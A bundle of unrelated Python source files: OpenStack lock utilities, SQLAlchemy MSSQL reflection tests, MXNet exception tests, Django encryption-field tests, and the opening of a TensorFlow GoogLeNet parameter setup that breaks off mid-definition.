ensures that only one thread will execute the foo method at a time.
Different methods can share the same lock::
@synchronized('mylock')
def foo(self, *args):
...
@synchronized('mylock')
def bar(self, *args):
...
This way only one of either foo or bar can be executing at a time.
"""
def wrap(f):
@functools.wraps(f)
def inner(*args, **kwargs):
try:
with lock(name, lock_file_prefix, external, lock_path):
LOG.debug(_('Got semaphore / lock "%(function)s"'),
{'function': f.__name__})
return f(*args, **kwargs)
finally:
LOG.debug(_('Semaphore / lock released "%(function)s"'),
{'function': f.__name__})
return inner
return wrap
def synchronized_with_prefix(lock_file_prefix):
"""Partial object generator for the synchronization decorator.
Redefine @synchronized in each project like so::
(in nova/utils.py)
from nova.openstack.common import lockutils
synchronized = lockutils.synchronized_with_prefix('nova-')
(in nova/foo.py)
from nova import utils
@utils.synchronized('mylock')
def bar(self, *args):
...
The lock_file_prefix argument is used to provide lock files on disk with a
meaningful prefix.
"""
return functools.partial(synchronized, lock_file_prefix=lock_file_prefix)
def main(argv):
"""Create a dir for locks and pass it to command from arguments
If you run this:
python -m openstack.common.lockutils python setup.py testr <etc>
a temporary directory will be created for all your locks and passed to all
your tests in an environment variable. The temporary dir will be deleted
afterwards and the return value will be preserved.
"""
lock_dir = tempfile.mkdtemp()
os.environ["NAILGUN_LOCK_PATH"] = lock_dir
try:
ret_val = subprocess.call(argv[1:])
finally:
shutil.rmtree(lock_dir, ignore_errors=True)
return ret_val
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
|
# -*- encoding: utf-8
from sqlalchemy import Column
from sqlalchemy import DDL
from sqlalchemy import event
from sqlalchemy import ForeignKey
from sqlalchemy import Index
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import schema
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import types
from sqlalchemy import util
from sqlalchemy.databases import mssql
from sqlalchemy.dialects.mssql import base
from sqlalchemy.dialects.mssql.information_schema import CoerceUnicode
from sqlalchemy.dialects.mssql.information_schema import tables
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import ComparesTables
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import in_
from sqlalchemy.testing import is_
from sqlalchemy.testing import mock
class ReflectionTest(fixtures.TestBase, ComparesTables, AssertsCompiledSQL):
__only_on__ = "mssql"
__backend__ = True
@testing.provide_metadata
def test_basic_reflection(self):
meta = self.metadata
users = Table(
"engine_users",
meta,
Column("user_id", types.INT, primary_key=True),
Column("user_name", types.VARCHAR(20), nullable=False),
Column("test1", types.CHAR(5), nullable=False),
Column("test2", types.Float(5), nullable=False),
Column("test2.5", types.Float(), nullable=False),
Column("test3", types.Text()),
Column("test4", types.Numeric, nullable=False),
Column("test4.5", types.Numeric(10, 2), nullable=False),
Column("test5", types.DateTime),
Column(
"parent_user_id",
types.Integer,
ForeignKey("engine_users.user_id"),
),
Column("test6", types.DateTime, nullable=False),
Column("test7", types.Text()),
Column("test8", types.LargeBinary()),
Column("test_passivedefault2", types.Integer, server_default="5"),
Column("test9", types.BINARY(100)),
Column("test_numeric", types.Numeric()),
)
addresses = Table(
"engine_email_addresses",
meta,
Column("address_id", types.Integer, primary_key=True),
Column(
"remote_user_id", types.Integer, ForeignKey(users.c.user_id)
),
Column("email_address", types.String(20)),
)
meta.create_all()
meta2 = MetaData()
reflected_users = Table(
"engine_users", meta2, autoload=True, autoload_with=testing.db
)
reflected_addresses = Table(
"engine_email_addresses",
meta2,
autoload=True,
autoload_with=testing.db,
)
self.assert_tables_equal(users, reflected_users)
self.assert_tables_equal(addresses, reflected_addresses)
@testing.provide_metadata
def _test_specific_type(self, type_obj, ddl):
metadata = self.metadata
table = Table("type_test", metadata, Column("col1", type_obj))
table.create()
m2 = MetaData()
table2 = Table("type_test", m2, autoload_with=testing.db)
self.assert_compile(
schema.CreateTable(table2),
"CREATE TABLE type_test (col1 %s NULL)" % ddl,
)
def test_xml_type(self):
self._test_specific_type(mssql.XML, "XML")
def test_image_type(self):
self._test_specific_type(mssql.IMAGE, "IMAGE")
def test_money_type(self):
self._test_specific_type(mssql.MONEY, "MONEY")
def test_numeric_prec_scale(self):
self._test_specific_type(mssql.NUMERIC(10, 2), "NUMERIC(10, 2)")
def test_float(self):
self._test_specific_type(mssql.FLOAT, "FLOAT(53)")
def test_real(self):
self._test_specific_type(mssql.REAL, "REAL")
def test_float_as_real(self):
# FLOAT(5) comes back as REAL
self._test_specific_type(mssql.FLOAT(5), "REAL")
@testing.provide_metadata
def test_identity(self):
metadata = self.metadata
table = Table(
"identity_test",
metadata,
Column(
"col1",
Integer,
mssql_identity_start=2,
mssql_identity_increment=3,
primary_key=True,
),
)
table.create()
meta2 = MetaData(testing.db)
table2 = Table("identity_test", meta2, autoload=True)
eq_(table2.c["col1"].dialect_options["mssql"]["identity_start"], 2)
eq_(table2.c["col1"].dialect_options["mssql"]["identity_increment"], 3)
@testing.emits_warning("Did not recognize")
@testing.provide_metadata
def test_skip_types(self):
metadata = self.metadata
testing.db.execute(
"""
create table foo (id integer primary key, data xml)
"""
)
with mock.patch.object(
testing.db.dialect, "ischema_names", {"int": mssql.INTEGER}
):
t1 = Table("foo", metadata, autoload=True)
assert isinstance(t1.c.id.type, Integer)
assert isinstance(t1.c.data.type, types.NullType)
@testing.provide_metadata
def test_cross_schema_fk_pk_name_overlaps(self):
# test for issue #4228
metadata = self.metadata
Table(
"subject",
metadata,
Column("id", Integer),
PrimaryKeyConstraint("id", name="subj_pk"),
schema=testing.config.test_schema,
)
Table(
"referrer",
metadata,
Column("id", Integer, primary_key=True),
Column(
"sid",
ForeignKey(
"%s.subject.id" % testing.config.test_schema,
name="fk_subject",
),
),
schema=testing.config.test_schema,
)
Table(
"subject",
metadata,
Column("id", Integer),
PrimaryKeyConstraint("id", name="subj_pk"),
schema=testing.config.test_schema_2,
)
metadata.create_all()
insp = inspect(testing.db)
eq_(
insp.get_foreign_keys("referrer", testing.config.test_schema),
[
{
"name": "fk_subject",
"constrained_columns": ["sid"],
"referred_schema": "test_schema",
"referred_table": "subject",
"referred_columns": ["id"],
}
],
)
@testing.provide_metadata
def test_table_name_that_is_greater_than_16_chars(self):
metadata = self.metadata
Table(
"ABCDEFGHIJKLMNOPQRSTUVWXYZ",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Index("foo_idx", "foo"),
)
metadata.create_all()
t = Table(
"ABCDEFGHIJKLMNOPQRSTUVWXYZ", MetaData(), autoload_with=testing.db
)
eq_(t.name, "ABCDEFGHIJKLMNOPQRSTUVWXYZ")
@testing.provide_metadata
def test_db_qualified_items(self):
metadata = self.metadata
Table("foo", metadata, Column("id", Integer, primary_key=True))
Table(
"bar",
metadata,
Column("id", Integer, primary_key=True),
Column("foo_id", Integer, ForeignKey("foo.id", name="fkfoo")),
)
metadata.create_all()
dbname = testing.db.scalar("select db_name()")
owner = testing.db.scalar("SELECT user_name()")
referred_schema = "%(dbname)s.%(owner)s" % {
"dbname": dbname,
"owner": owner,
}
inspector = inspect(testing.db)
bar_via_db = inspector.get_foreign_keys("bar", schema=referred_schema)
eq_(
bar_via_db,
[
{
"referred_table": "foo",
"referred_columns": ["id"],
"referred_schema": referred_schema,
"name": "fkfoo",
"constrained_columns": ["foo_id"],
}
],
)
assert inspect(testing.db).has_table("bar", schema=referred_schema)
m2 = MetaData()
Table(
"bar",
m2,
schema=referred_schema,
autoload=True,
autoload_with=testing.db,
)
eq_(m2.tables["%s.foo" % referred_schema].schema, referred_schema)
@testing.provide_metadata
def test_indexes_cols(self):
metadata = self.metadata
t1 = Table("t", metadata, Column("x", Integer), Column("y", Integer))
Index("foo", t1.c.x, t1.c.y)
metadata.create_all()
m2 = MetaData()
t2 = Table("t", m2, autoload=True, autoload_with=testing.db)
eq_(set(list(t2.indexes)[0].columns), set([t2.c["x"], t2.c.y]))
@testing.provide_metadata
def test_indexes_cols_with_commas(self):
metadata = self.metadata
t1 = Table(
"t",
metadata,
Column("x, col", Integer, key="x"),
Column("y", Integer),
)
Index("foo", t1.c.x, t1.c.y)
metadata.create_all()
m2 = MetaData()
t2 = Table("t", m2, autoload=True, autoload_with=testing.db)
eq_(set(list(t2.indexes)[0].columns), set([t2.c["x, col"], t2.c.y]))
@testing.provide_metadata
def test_indexes_cols_with_spaces(self):
metadata = self.metadata
t1 = Table(
"t",
metadata,
Column("x col", Integer, key="x"),
Column("y", Integer),
)
Index("foo", t1.c.x, t1.c.y)
metadata.create_all()
m2 = MetaData()
t2 = Table("t", m2, autoload=True, autoload_with=testing.db)
eq_(set(list(t2.indexes)[0].columns), set([t2.c["x col"], t2.c.y]))
@testing.provide_metadata
def test_max_ident_in_varchar_not_present(self):
"""test [ticket:3504].
Here we are testing not just that the "max" token comes back
as None, but also that these types accept "max" as the value
of "length" on construction, which isn't a directly documented
pattern however is likely in common use.
"""
metadata = self.metadata
Table(
"t",
metadata,
Column("t1", types.String),
Column("t2", types.Text("max")),
Column("t3", types.Text("max")),
Column("t4", types.LargeBinary("max")),
Column("t5", types.VARBINARY("max")),
)
metadata.create_all()
for col in inspect(testing.db).get_columns("t"):
is_(col["type"].length, None)
in_("max", str(col["type"].compile(dialect=testing.db.dialect)))
class InfoCoerceUnicodeTest(fixtures.TestBase, AssertsCompiledSQL):
def test_info_unicode_coercion(self):
dialect = mssql.dialect()
value = CoerceUnicode().bind_processor(dialect)("a string")
assert isinstance(value, util.text_type)
def test_info_unicode_cast_no_2000(self):
dialect = mssql.dialect()
dialect.server_version_info = base.MS_2000_VERSION
stmt = tables.c.table_name == "somename"
self.assert_compile(
stmt,
"[INFORMATION_SCHEMA].[TABLES].[TABLE_NAME] = :table_name_1",
dialect=dialect,
)
def test_info_unicode_cast(self):
dialect = mssql.dialect()
dialect.server_version_info = base.MS_2005_VERSION
stmt = tables.c.table_name == "somename"
self.assert_compile(
stmt,
"[INFORMATION_SCHEMA].[TABLES].[TABLE_NAME] = "
"CAST(:table_name_1 AS NVARCHAR(max))",
dialect=dialect,
)
class ReflectHugeViewTest(fixtures.TestBase):
__only_on__ = "mssql"
__backend__ = True
# crashes on freetds 0.91, not worth it
__skip_if__ = (lambda: testing.requires.mssql_freetds.enabled,)
def setup(self):
self.col_num = 150
self.metadata = MetaData(testing.db)
t = Table(
"base_table",
self.metadata,
*[
Column("long_named_column_number_%d" % i, Integer)
for i in range(self.col_num)
]
)
self.view_str = view_str = (
"CREATE VIEW huge_named_view AS SELECT %s FROM base_table"
% (
",".join(
"long_named_column_number_%d" % i
for i in range(self.col_num)
)
)
)
assert len(view_str) > 4000
event.listen(t, "after_create", DDL(view_str))
event.listen(t, "before_drop", DDL("DROP VIEW huge_named_view"))
self.metadata.create_all()
def teardown(self):
self.metadata.drop_all()
def test_inspect_view_definition(self):
inspector = Inspector.from_engine(testing.db)
view_def = inspector.get_view_definition("huge_named_view")
eq_(view_def, self.view_str)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import mxnet as mx
import numpy as np
from mxnet import gluon
from mxnet.gluon import nn
from mxnet.base import MXNetError
from mxnet.test_utils import assert_exception, default_context, set_default_context, use_np
import pytest
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="This test assumes asynchronous execution.")
def test_exc_imperative():
def imperative(exec_numpy=True):
a = mx.nd.random.normal(0, 1, (2, 2))
b = mx.nd.random.normal(0, -1, (2, 2))
c = mx.nd.dot(a, b)
if exec_numpy:
c.asnumpy()
imperative(exec_numpy=False)
pytest.raises(MXNetError, imperative, exec_numpy=True)
def test_exc_symbolic():
def symbolic(exec_backward=True, waitall=True):
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
z = mx.sym.Variable('z')
x_shape = (2, 2)
z_shape = (3, 2)
inputs = [x, y]
out = mx.symbol.ElementWiseSum(*inputs, name="esum")
out = mx.sym.dot(z, out)
out2 = mx.sym.random.normal(0, -1, x_shape, ctx=default_context())
out = mx.sym.dot(out, out2)
out = mx.sym.make_loss(out)
arr = {'x': mx.nd.random.normal(0, 1, x_shape, ctx=default_context()),
'y': mx.nd.random.normal(0, 1, x_shape, ctx=default_context()),
'z': mx.nd.random.normal(0, 1, z_shape, ctx=default_context())}
arr_grad = {'x': mx.nd.empty(x_shape), 'y': mx.nd.empty(x_shape), 'z': mx.nd.empty(z_shape)}
exec1 = out._bind(ctx=default_context(), args=arr, args_grad=arr_grad)
outputs = exec1.forward()
if exec_backward:
exec1.backward()
if waitall:
mx.nd.waitall()
else:
exec1.grad_arrays[0].asnumpy()
else:
if waitall:
mx.nd.waitall()
else:
outputs[0].asnumpy()
pytest.raises(MXNetError, symbolic, exec_backward=False)
pytest.raises(MXNetError, symbolic, exec_backward=True)
pytest.raises(MXNetError, symbolic, exec_backward=False, waitall=True)
pytest.raises(MXNetError, symbolic, exec_backward=True, waitall=True)
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="This test assumes asynchronous execution.")
def test_exc_gluon():
def gluon(exec_wait=True, waitall=False):
model = nn.Sequential()
model.add(nn.Dense(128, activation='tanh', in_units=10, flatten=False))
model.add(nn.Dropout(1))
model.add(nn.Dense(64, activation='tanh', in_units=256),
nn.Dense(32, in_units=64))
model.initialize(ctx=[default_context()])
x = mx.sym.var('data')
y = model(x)
z = model(mx.nd.random.normal(10, -10, (32, 2, 10), ctx=default_context()))
if waitall:
mx.nd.waitall()
elif exec_wait:
z.wait_to_read()
gluon(exec_wait=False)
pytest.raises(MXNetError, gluon, exec_wait=True)
pytest.raises(MXNetError, gluon, waitall=True)
def test_exc_multiple_waits():
def multiple_waits(waitall=False):
# Test calling failed op followed by wait_to_read or waitall twice
# Intention is to test rethrow for multiple wait_to_reads and waitalls
# for vars with exceptions in same scope
caught = False
try:
a = mx.nd.random.normal(0, -1, (2, 2)).copyto(default_context())
if waitall:
mx.nd.waitall()
else:
a.wait_to_read()
except MXNetError:
caught = True
assert caught, "No exception thrown, exception should be rethrown with wait_to_read/waitall"
try:
b = mx.nd.random.normal(0, -1, (2, 2)).copyto(default_context())
if waitall:
mx.nd.waitall()
else:
b.wait_to_read()
except MXNetError:
caught = True
assert caught, "No exception thrown, exception should be rethrown with wait_to_read/waitall"
multiple_waits(waitall=False)
multiple_waits(waitall=True)
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="This test assumes asynchronous execution.")
def test_exc_post_fail():
def post_fail(waitall=False):
caught = False
try:
a, b = mx.nd.random_normal(0, -1, (2, 2)).copyto(default_context())
if waitall:
mx.nd.waitall()
else:
a.asnumpy()
except MXNetError:
caught = True
assert caught, "No exception thrown"
b.asnumpy()
post_fail(waitall=False)
post_fail(waitall=True)
def test_exc_mutable_var_fail():
def mutable_var_check(waitall=False):
a, b = mx.nd.random_normal(0, -1, (2, 2)).copyto(default_context())
a = mx.nd.dot(a, a)
if waitall:
mx.nd.waitall()
else:
a.asnumpy()
pytest.raises(MXNetError, mutable_var_check, waitall=False)
pytest.raises(MXNetError, mutable_var_check, waitall=True)
def test_multiple_waitalls():
caught = False
try:
a = mx.nd.random.normal(0, -1, (2, 2)).copyto(default_context())
mx.nd.waitall()
except MXNetError:
caught = True
assert caught, "No exception thrown"
mx.nd.waitall()
def run_training_iteration(data):
output = net(data)
net = gluon.nn.HybridSequential()
net.add(gluon.nn.Dense(10))
ctx = default_context()
net.initialize(mx.init.Xavier(), ctx=ctx)
data = mx.nd.ones((3, 4))
mx.profiler.set_state("run")
run_training_iteration(data)
mx.nd.waitall()
mx.profiler.set_state("stop")
def test_opencv_exception():
def check_resize():
img = mx.nd.ones((1200, 1600, 3))
img = mx.image.imresize(img, 320, 320, interp=-1)
img.asnumpy()
pytest.raises(MXNetError, check_resize)
def test_np_reshape_exception():
a = mx.np.ones((10, 10))
a.reshape((-1,)).asnumpy() # Check no-raise
pytest.raises(MXNetError, lambda: a.reshape((1,)))
pytest.raises(MXNetError, lambda: mx.np.reshape(a, (1,)))
pytest.raises(MXNetError, lambda: mx.np.reshape(a, (-1, 3)))
@use_np
def test_np_random_incorrect_named_arguments():
random_ops = ['uniform', 'normal', 'randint', 'choice']
for op_name in random_ops:
op = getattr(mx.np.random, op_name, None)
assert op is not None
pytest.raises(TypeError, op, shape=())
pytest.raises(TypeError, op, shape=None)
|
|
from __future__ import absolute_import, unicode_literals
import os
import mock
from django.test import TestCase
from django.utils.encoding import force_text
from dj_oydiv.utils.random import random_ascii_letters
from dj_oydiv.models import VidyoAdmin
from dj_oydiv.utils.crypto import (
sym_encrypt_cfb_128,
sym_decrypt_cfb_dict
)
from . import PACKAGE_BASE
from .models import (
CryptoTextTest,
save_then_retrieve,
)
class TestCryptoTextTests(TestCase):
"""
The test in this class validate basic sanity of the crypto object.
These tests include sanity-checking/data verification that the data stored
looks *somewhat* encrypted. They're mostly just functionality tests, and
assertions that bad input results in errors as we're relying on the sanity
on pyCrypto
"""
cleartext = 'aaaaaaaaaaaaaaaaaa'
key = 'password'
badkey = 'wrong!'
newkey = 'anothertotallysecretpassword'
def test_no_cleartext_saved(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t.save()
pk = t.pk
t = CryptoTextTest.objects.get(pk=pk)
t.key = self.key
self.assertNotEqual(t.ciphertext, self.cleartext)
self.assertNotIn(self.cleartext, t.ciphertext)
def test_change_key(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
t.change_key(self.newkey)
t = save_then_retrieve(t, key=self.newkey)
self.assertEqual(self.cleartext, t.data)
def test_data_property(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
self.assertNotEqual(t.data, t.ciphertext)
old_ciphertext = t.ciphertext
t.data = self.cleartext + self.cleartext
self.assertNotEqual(old_ciphertext, t.ciphertext)
def test_empty_key_fails(self):
with self.assertRaises(ValueError):
CryptoTextTest(data=self.cleartext, key='')
def test_db_manager_search_with_kwargs_key(self):
pass
def test_verify_returned_data_equal(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
self.assertEqual(self.cleartext, t.data)
def test_bad_password_fails(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
with self.assertRaises(ValueError):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
save_then_retrieve(t, key=self.badkey).data
def test_tamper_evident(self):
"""change a digit of the hmac_digest, and assert that decryption fails with ValueError"""
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
scheme, iv, kdf_iter, kdf_salt, hmac_algo, hmac_hex, \
ciphertext = t.ciphertext.split("$")
l = int(hmac_hex, base=16)
#convert the hmac to int, add 1, and convert back to hex
hmac_hex = hex(l + 1)[2:-1]
t.ciphertext = '$'.join((
scheme, iv, kdf_iter, kdf_salt,
hmac_algo, hmac_hex, ciphertext)
)
with self.assertRaises(ValueError):
t.data
def test_large_binary_data(self):
"""
We're using a text field and require the ability to store large amount of binary data.
"""
data = os.urandom(2 ** 20)
t = CryptoTextTest(data=data, key=self.key)
t = save_then_retrieve(t, key=self.key)
self.assertEqual(t._decrypt(self.key), data)
def test_same_params_different_outputs(self):
"""Verify we're using unique values for salt"""
t1 = CryptoTextTest(data=self.cleartext, key=self.key)
t2 = CryptoTextTest(data=self.cleartext, key=self.key)
t1 = save_then_retrieve(t1, key=self.key)
t2 = save_then_retrieve(t2, key=self.key)
self.assertNotEqual(t1.ciphertext, t2.ciphertext)
def test_crypto_roundtrip(self):
t = CryptoTextTest()
t.key = self.key
t.data = self.cleartext
t = save_then_retrieve(t, key=self.key)
self.assertEqual(self.cleartext, t.data)
class TestMultipleCrypto(TestCase):
"""
User objects delegate the responsiblity for handling re-keying to the assigned admin
objects.
Tests here check that Admin key-rotation works
"""
def test_it_please(self):
# XXX Refactor this into an actual test.
for admin in [VidyoAdmin(portal_user=str(1 + x)) for x in range(1)]:
admin.set_password('mypassword', 'mysecretdata')
admin.save()
class TestRandomAsciiLetters(TestCase):
ascii_printable = ''.join(chr(x) for x in range(0x20, 0x7f, 1))
def test_issue81_regression(self):
"""We switched to django.utils.crypto.get_random_string() because we were
generating passwords with the builtin mersenne twister, seeded manually
from '/dev/urandom'.
This had already been 'fixed' once due to missing parens in a seed() call.
This regression test ensures that we're using django's sane, portable
crypto-quality generator, instead of some unvetted pile.
"""
with mock.patch(
PACKAGE_BASE + '.utils.random.get_random_string',
mock.MagicMock(return_value='thisisrandom')
) as patched:
string = random_ascii_letters()
self.assertEqual(string, 'thisisrandom')
self.assertTrue(patched.called)
def test_ascii_only(self):
for x in range(1000):
s = random_ascii_letters()
for c in s:
self.assertIn(c, self.ascii_printable)
def test_multiple_iterations_nequal(self):
"""Totally naive basic randomness check.
(the implementation uses django.utils.crypto.get_random_string()
under the hood so this should suffice)
"""
s1 = random_ascii_letters()
s2 = random_ascii_letters()
self.assertNotEqual(s1, s2)
def test_crypto_dict_roundtrip(self):
crypt = sym_encrypt_cfb_128('secret', 'sauce')
self.assertEqual(force_text(sym_decrypt_cfb_dict('secret', crypt)), 'sauce')
class CryptoBackwardCompatibilityTests(TestCase):
"""
We want the ability to add/remove dependencies as needed for speed, platform
availability or similiar.
However, data in production databases should still be valid.
Test these fixtures decrypt to the expected values.
A new feature, primitive or significant change should add a
backwards compatibility test here
"""
def test_backward_compatibility_sym_decrypt_cfb_128(self):
# sym_encrypt_cfb_128('secret', 'something nobody knows') git@f6688dde6
crypt = {
'aes_iv_64': b'azm8m1zKYDQ/uuCGzqxMGA==',
'ciphertext_64': b'1n3rGiH4AXBQyz4EGT6+0ruhf3ev9A==',
'hmac_algo': 'sha256',
'hmac_hex': 'ef849dedefc26b45c1d13cd50de5487159f9af9fccf987318217491f47287588',
'kdf_algo': 'PBKDF2',
'kdf_iter': 1,
'kdf_salt_64': b'J0E0RKe0r+w='
}
self.assertEqual(
force_text(sym_decrypt_cfb_dict('secret', crypt)),
'something nobody knows'
)
|
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import tensorflow as tf
def init_param(number_classes=1000):
model_param = {
'conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[7, 7, 3, 64], stddev=1e-4, dtype=tf.float32)),
'conv1_strides': 2, 'conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'conv1_name': 'conv1', 'conv1_padding': 'SAME',
'max1_ksize': 3,
'max1_strides': 2, 'max1_name': 'max1', 'max1_padding': 'SAME',
'norm1_depth_radius': 2.5,
'norm1_bias': 2.0, 'norm1_alpha': 1e-4, 'norm1_beta': 0.75, 'norm1_name': 'local_resp_norm1',
'conv2_kernel': tf.Variable(tf.truncated_normal(shape=[1, 1, 64, 192], stddev=1e-4, dtype=tf.float32)),
'conv2_strides': 1, 'conv2_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'conv2_name': 'conv2', 'conv2_padding': 'VALID',
'conv3_kernel': tf.Variable(tf.truncated_normal(shape=[3, 3, 192, 192], stddev=1e-4, dtype=tf.float32)),
'conv3_strides': 1, 'conv3_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'conv3_name': 'conv3', 'conv3_padding': 'SAME',
'norm2_depth_radius': 2.5,
'norm2_bias': 2.0, 'norm2_alpha': 1e-4, 'norm2_beta': 0.75, 'norm2_name': 'local_resp_norm2',
'inception1_name': 'inception1',
'inception1_concat_axis': 3,
'inception1_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception1_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 64], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch1_conv1_name': 'inception1_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 96], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32)),
'patch2_conv1_name': 'inception1_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 96, 128], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch2_conv2_name': 'inception1_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 16], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[16], dtype=tf.float32)),
'patch3_conv1_name': 'inception1_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 16, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv2_name': 'inception1_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception1_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 32], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch4_conv1_name': 'inception1_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception2_name': 'inception2',
'inception2_concat_axis': 3,
'inception2_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception2_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 128], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch1_conv1_name': 'inception2_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 128], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch2_conv1_name': 'inception2_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 128, 192], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'patch2_conv2_name': 'inception2_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception2_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 96], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32)),
'patch3_conv2_name': 'inception2_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception2_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception2_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception3_name': 'inception3',
'inception3_concat_axis': 3,
'inception3_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception3_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 192], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'patch1_conv1_name': 'inception3_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 96], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32)),
'patch2_conv1_name': 'inception3_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
